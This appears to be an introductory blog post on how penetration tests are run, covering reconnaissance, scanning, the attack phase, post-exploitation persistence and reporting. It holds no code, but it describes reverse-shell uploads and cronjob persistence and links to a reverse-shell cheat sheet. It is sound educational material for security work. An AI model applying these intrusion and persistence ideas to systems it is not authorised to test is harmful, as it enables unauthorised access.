Nowadays, organizing yourself is becoming crucial in your everyday life. From diet to training to work, making good planning is key when you’re trying to chase your goals efficiently. In this case, our main goal is to perform a penetration test to a system and there is a well-known way to achieve this in our community:
- Information gathering/reconnaissance
- Vulnerability scan
- Attack phase
- Post-exploitation
- Reporting
So, let’s describe each one of these.
Information gathering/reconnaissance
As the title says, a penetration tester must gather all information he/she can to be able to effectively jump into the next steps. Knowing your target’s business is very important and you should spend as much time as you can analyzing this.
Imagine that your target is an e-commerce website. In this case, you should take your time and navigate through all the pages (yes, all of them), trying to pay attention to URL formats, existing forms, what is the product, how it is sold, etc. Let’s say that this e-commerce has three plans: free, standard and premium. If possible, you should have an account for each one of these and see what you can do with each one. Remember that every new feature you discover increases the attack surface of the target’s system.
After knowing everything about the product, I would start by identifying open ports, doing brute force directories, search for possible subdomains, check all website’s networking, etc. Usually, you should be asking this kind of questions:
- Which endpoints are called and when? Is there a difference in the endpoint when buying as a standard user? And as a premium one?
- Which cookies are used and what is the difference between users? Is there any place on the website where I can upload a file? In which format?
- What is the framework and libraries this site is using? In which versions are they?
- Is there a way that I could find some more info around the internet? Tip: Check this out https://github.com/laramies/theHarvester
Now that you have all the information and you have squeezed all the product and technical knowledge about your target, it’s time to go to the next phase!
Vulnerability scan
Usually performed by using software like BurpSuite, Nessus, Nikto, SearchSploit, and a long etcetera. You’re objective is to check if the current system (that you already know from the first step) has existing vulnerabilities that can be “automatically” exploited (because there is already a script to do it). Also, as a second step, you should try to look for vulnerabilities such as XSS, XXE, SSRF or CSRF on the website and yes, you also have tools to help you with that.
To be honest, if you have the money you should aim to grab a BurpSuite PRO license since it has a bunch of useful tools like a spider, intruder, repeater, plugins, etc. Otherwise, you should look for different options. I’m currently looking for some free (or at least way cheaper) setup that can substitute it so if you know about it, let me know!
Attack phase
As soon as you discover a vulnerability that could make you enter somehow in the system (like uploading a PHP file that has a reverse TCP script in it), you will be entering into the attack phase. In this phase, and if you got access to the system, you must analyze in which state is your user when landing in the target’s console. Now it’s time to gather all the information you can from the current system that you’re connected at:
- How many users does the system have and which one are you?
- Which services and/or processes are running?
- Are IPTABLES configured? Can you check for other devices in the same network?
- Very important: Are there any logs and/or backups that could be unencrypted? Maybe a second drive?
- Also very important: Are there any cronjobs? public/private keys that you can access?
Post-exploitation
The lasts questions from above (and of course if you find something) make you enter the post-exploitation phase. In this one, your objective is to maintain access to the system. You should be capable of entering that server as many times as you want. Some ideas that come to my mind are:
- Using cronjobs + reverse shell (in case the machine is restarted)
- Start service with your script
- Take advantage of existing automated scripts that you could modify
Reporting
When penetration testing is finished, the last step is collecting all the vulnerabilities you could find and create a report. The format of the report could be a pdf or even a video showing what did you find and it should be as specific as possible. I don’t have much experience writing pentest reports so I won’t dig into this but if you have any tips, just let me know!
Bonus tip
I just want to mention that taking notes is the most important thing you should do when performing a penetration test. You want to avoid repetition as much as possible. For example, you shouldn’t have to run Nmap again to check for open ports if you did it before. Save all the information you can so you can just check it in the future and repeat steps only if you feel that the system has changed.
Acronyms and concepts:
- XSS: Cross-Site Scripting
- CSRF: Cross-Site Request Forgery
- XXE: XML external entity
- SSRF: Server Side Request Forgery
- Reverse shell: Opening a remote shell from our target machine. Here you have some examples: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet. I’ll talk about this in the future.